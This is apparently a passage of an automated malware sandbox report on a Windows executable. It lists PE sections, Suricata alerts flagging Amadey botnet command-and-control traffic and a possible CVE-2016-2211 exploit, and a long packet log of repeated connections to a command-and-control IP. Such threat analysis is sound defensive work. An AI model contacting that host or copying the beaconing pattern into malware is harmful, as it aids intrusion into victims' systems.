wcsgqvbi	0x4b1000	0x1000	0x400	2b3a1c5915bf3e1fbaba4c8470f87eee	False	0.8134765625	data	6.224005433727478	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4b2000	0x3000	0x2200	435f1c989a381efcc0e09bb92c0e70fd	False	0.06399356617647059	DOS executable (COM)	0.7934948818570039	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x4aff74	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-26T12:57:22.339144+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49726	80	192.168.2.5	185.215.113.19
2024-07-26T12:56:19.153232+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49704	20.12.23.50	192.168.2.5
2024-07-26T12:57:36.611454+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49738	80	192.168.2.5	185.215.113.19
2024-07-26T12:57:03.371450+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49711	80	192.168.2.5	185.215.113.19
2024-07-26T12:56:57.011401+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49710	20.12.23.50	192.168.2.5

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 26, 2024 12:57:02.602766037 CEST	49711	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:02.607825994 CEST	80	49711	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:02.607949018 CEST	49711	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:02.608081102 CEST	49711	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:02.613060951 CEST	80	49711	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:03.371390104 CEST	80	49711	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:03.371449947 CEST	49711	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:03.373843908 CEST	49711	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:03.378854990 CEST	80	49711	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:03.623560905 CEST	80	49711	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:03.625206947 CEST	49711	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:03.743693113 CEST	49711	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:03.743949890 CEST	49712	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:03.750077963 CEST	80	49712	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:03.750403881 CEST	80	49711	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:03.750504017 CEST	49711	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:03.751840115 CEST	49712	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:03.751841068 CEST	49712	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:03.756913900 CEST	80	49712	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:04.531441927 CEST	80	49712	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:04.531737089 CEST	49712	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:04.532567978 CEST	49712	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:04.538160086 CEST	80	49712	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:04.784935951 CEST	80	49712	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:04.785196066 CEST	49712	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:04.895282984 CEST	49712	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:04.895720005 CEST	49713	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:04.900938988 CEST	80	49713	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:04.901168108 CEST	49713	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:04.901236057 CEST	80	49712	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:04.901309013 CEST	49713	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:04.901336908 CEST	49712	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:04.906338930 CEST	80	49713	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:05.689474106 CEST	80	49713	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:05.689601898 CEST	49713	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:05.690505028 CEST	49713	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:05.695559025 CEST	80	49713	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:05.953767061 CEST	80	49713	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:05.954142094 CEST	49713	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:06.067136049 CEST	49713	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:06.067246914 CEST	49714	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:06.072068930 CEST	80	49714	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:06.072189093 CEST	49714	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:06.072371960 CEST	80	49713	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:06.072527885 CEST	49713	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:06.074106932 CEST	49714	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:06.079128981 CEST	80	49714	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:06.872148991 CEST	80	49714	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:06.872468948 CEST	49714	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:06.873008013 CEST	49714	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:06.878093958 CEST	80	49714	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:07.130827904 CEST	80	49714	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:07.131053925 CEST	49714	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:07.238867044 CEST	49714	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:07.239388943 CEST	49715	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:07.244493008 CEST	80	49714	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:07.244546890 CEST	80	49715	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:07.244611025 CEST	49714	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:07.244820118 CEST	49715	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:07.244910002 CEST	49715	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:07.249975920 CEST	80	49715	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:08.211889982 CEST	80	49715	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:08.212074995 CEST	49715	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:08.213229895 CEST	49715	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:08.213963985 CEST	80	49715	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:08.214055061 CEST	49715	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:08.218205929 CEST	80	49715	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:08.466248035 CEST	80	49715	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:08.466377974 CEST	49715	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:08.582670927 CEST	49715	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:08.583226919 CEST	49716	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:08.588572979 CEST	80	49715	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:08.588592052 CEST	80	49716	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:08.588670015 CEST	49715	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:08.588865042 CEST	49716	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:08.588977098 CEST	49716	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:08.593944073 CEST	80	49716	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:09.377474070 CEST	80	49716	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:09.377688885 CEST	49716	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:09.378551006 CEST	49716	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:09.383568048 CEST	80	49716	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:09.638217926 CEST	80	49716	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:09.638349056 CEST	49716	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:09.754781961 CEST	49716	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:09.755006075 CEST	49717	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:09.760435104 CEST	80	49717	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:09.760554075 CEST	49717	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:09.760751963 CEST	49717	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:09.761879921 CEST	80	49716	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:09.761950016 CEST	49716	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:09.767474890 CEST	80	49717	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:10.576160908 CEST	80	49717	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:10.576278925 CEST	49717	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:10.577260017 CEST	49717	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:10.583178043 CEST	80	49717	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:10.835897923 CEST	80	49717	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:10.835984945 CEST	49717	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:10.942974091 CEST	49717	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:10.943743944 CEST	49718	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:10.950154066 CEST	80	49718	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:10.950251102 CEST	49718	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:10.950582981 CEST	49718	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:10.955854893 CEST	80	49718	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:10.958911896 CEST	80	49717	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:10.958991051 CEST	49717	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:11.744389057 CEST	80	49718	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:11.744502068 CEST	49718	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:11.747679949 CEST	49718	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:11.752711058 CEST	80	49718	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:12.151231050 CEST	80	49718	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:12.151345968 CEST	49718	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:12.256766081 CEST	49718	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:12.257081985 CEST	49719	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:12.262315035 CEST	80	49719	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:12.262427092 CEST	49719	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:12.262633085 CEST	49719	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:12.264920950 CEST	80	49718	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:12.264997959 CEST	49718	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:12.268232107 CEST	80	49719	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:13.137680054 CEST	80	49719	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:13.137931108 CEST	49719	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:13.138874054 CEST	49719	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:13.149976015 CEST	80	49719	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:13.399353027 CEST	80	49719	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:13.399662971 CEST	49719	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:13.504672050 CEST	49719	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:13.504981995 CEST	49720	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:13.510116100 CEST	80	49720	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:13.510257006 CEST	49720	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:13.510565996 CEST	49720	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:13.511933088 CEST	80	49719	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:13.512121916 CEST	49719	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:13.515554905 CEST	80	49720	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:14.295916080 CEST	80	49720	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:14.296194077 CEST	49720	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:14.296927929 CEST	49720	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:14.303033113 CEST	80	49720	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:14.546863079 CEST	80	49720	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:14.547076941 CEST	49720	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:14.660731077 CEST	49720	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:14.661070108 CEST	49721	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:14.666213989 CEST	80	49721	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:14.666336060 CEST	49721	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:14.666652918 CEST	80	49720	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:14.666727066 CEST	49720	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:14.668911934 CEST	49721	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:14.673757076 CEST	80	49721	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:15.441282988 CEST	80	49721	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:15.441616058 CEST	49721	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:15.442255974 CEST	49721	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:15.447874069 CEST	80	49721	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:15.944345951 CEST	80	49721	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:15.944446087 CEST	49721	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:15.947699070 CEST	80	49721	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:15.947807074 CEST	49721	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:16.052274942 CEST	49721	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:16.052568913 CEST	49722	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:16.057792902 CEST	80	49722	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:16.057957888 CEST	49722	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:16.058193922 CEST	49722	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:16.058589935 CEST	80	49721	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:16.058669090 CEST	49721	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:16.063359976 CEST	80	49722	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:16.951685905 CEST	80	49722	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:16.951781988 CEST	49722	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:16.952469110 CEST	49722	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:16.958616018 CEST	80	49722	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:17.212517023 CEST	80	49722	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:17.212624073 CEST	49722	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:17.316914082 CEST	49722	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:17.317240000 CEST	49723	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:17.322472095 CEST	80	49723	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:17.322567940 CEST	49723	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:17.322700977 CEST	49723	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:17.323606014 CEST	80	49722	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:17.323676109 CEST	49722	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:17.327713966 CEST	80	49723	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:18.091409922 CEST	80	49723	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:18.091526031 CEST	49723	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:18.092181921 CEST	49723	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:18.097045898 CEST	80	49723	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:18.676354885 CEST	80	49723	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:18.676636934 CEST	49723	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:18.699738026 CEST	80	49723	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:18.699938059 CEST	49723	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:18.831409931 CEST	49723	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:18.831811905 CEST	49724	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:18.838943958 CEST	80	49724	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:18.838999033 CEST	80	49723	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:18.839077950 CEST	49724	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:18.839108944 CEST	49723	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:18.839303970 CEST	49724	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:18.844778061 CEST	80	49724	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:19.613095999 CEST	80	49724	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:19.613209963 CEST	49724	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:19.619328976 CEST	49724	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:19.625405073 CEST	80	49724	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:19.871264935 CEST	80	49724	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:19.871373892 CEST	49724	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:19.973259926 CEST	49724	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:19.973663092 CEST	49725	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:19.979899883 CEST	80	49725	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:19.979986906 CEST	49725	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:19.980202913 CEST	80	49724	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:19.980209112 CEST	49725	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:19.980377913 CEST	49724	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:19.989331961 CEST	80	49725	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:20.795144081 CEST	80	49725	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:20.795535088 CEST	49725	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:20.799113035 CEST	49725	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:20.804620028 CEST	80	49725	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:21.051506996 CEST	80	49725	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:21.051695108 CEST	49725	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:21.161092997 CEST	49725	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:21.161241055 CEST	49726	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:21.166722059 CEST	80	49726	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:21.166914940 CEST	49726	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:21.167131901 CEST	49726	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:21.167191029 CEST	80	49725	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:21.167279005 CEST	49725	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:21.172089100 CEST	80	49726	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:22.338859081 CEST	80	49726	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:22.339143991 CEST	49726	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:22.339824915 CEST	49726	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:22.343763113 CEST	80	49726	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:22.343828917 CEST	49726	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:22.354600906 CEST	80	49726	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:22.599232912 CEST	80	49726	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:22.599572897 CEST	49726	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:22.707828999 CEST	49726	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:22.708173037 CEST	49727	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:22.719075918 CEST	80	49727	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:22.719279051 CEST	49727	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:22.719438076 CEST	49727	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:22.722578049 CEST	80	49726	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:22.722800016 CEST	49726	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:22.724412918 CEST	80	49727	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:23.511310101 CEST	80	49727	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:23.511532068 CEST	49727	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:23.512319088 CEST	49727	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:23.517426968 CEST	80	49727	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:23.762840986 CEST	80	49727	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:23.762963057 CEST	49727	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:23.879724026 CEST	49727	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:23.880081892 CEST	49728	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:23.887440920 CEST	80	49728	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:23.887701035 CEST	49728	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:23.887835979 CEST	49728	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:23.900146961 CEST	80	49727	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:23.900243044 CEST	49727	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:23.908571959 CEST	80	49728	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:24.648559093 CEST	80	49728	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:24.648725986 CEST	49728	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:24.649498940 CEST	49728	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:24.657017946 CEST	80	49728	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:24.896326065 CEST	80	49728	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:24.896786928 CEST	49728	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:25.005280972 CEST	49728	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:25.005731106 CEST	49729	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:25.010775089 CEST	80	49729	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:25.010870934 CEST	49729	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:25.010998011 CEST	49729	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:25.012423992 CEST	80	49728	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:25.012604952 CEST	49728	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:25.015855074 CEST	80	49729	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:25.795883894 CEST	80	49729	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:25.795959949 CEST	49729	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:25.796999931 CEST	49729	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:25.802105904 CEST	80	49729	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:26.054594040 CEST	80	49729	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:26.054795980 CEST	49729	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:26.160870075 CEST	49729	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:26.161211014 CEST	49730	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:26.166865110 CEST	80	49729	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:26.166891098 CEST	80	49730	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:26.166971922 CEST	49729	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:26.167057991 CEST	49730	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:26.167217016 CEST	49730	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:26.172090054 CEST	80	49730	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:26.912312031 CEST	80	49730	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:26.912401915 CEST	49730	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:26.913232088 CEST	49730	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:26.919161081 CEST	80	49730	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:27.159554005 CEST	80	49730	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:27.159791946 CEST	49730	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:27.270039082 CEST	49730	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:27.270592928 CEST	49731	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:27.289747000 CEST	80	49731	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:27.290047884 CEST	49731	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:27.290047884 CEST	49731	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:27.298829079 CEST	80	49730	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:27.298923969 CEST	49730	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:27.300084114 CEST	80	49731	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:28.089067936 CEST	80	49731	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:28.089447021 CEST	49731	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:28.090045929 CEST	49731	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:28.094965935 CEST	80	49731	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:28.343152046 CEST	80	49731	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:28.343544006 CEST	49731	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:28.457861900 CEST	49731	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:28.458189011 CEST	49732	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:28.464569092 CEST	80	49731	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:28.464768887 CEST	49731	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:28.466865063 CEST	80	49732	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:28.466972113 CEST	49732	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:28.467152119 CEST	49732	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:28.472278118 CEST	80	49732	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:29.259757042 CEST	80	49732	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:29.259978056 CEST	49732	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:29.260755062 CEST	49732	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:29.265796900 CEST	80	49732	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:29.514868975 CEST	80	49732	185.215.113.19	192.168.2.5
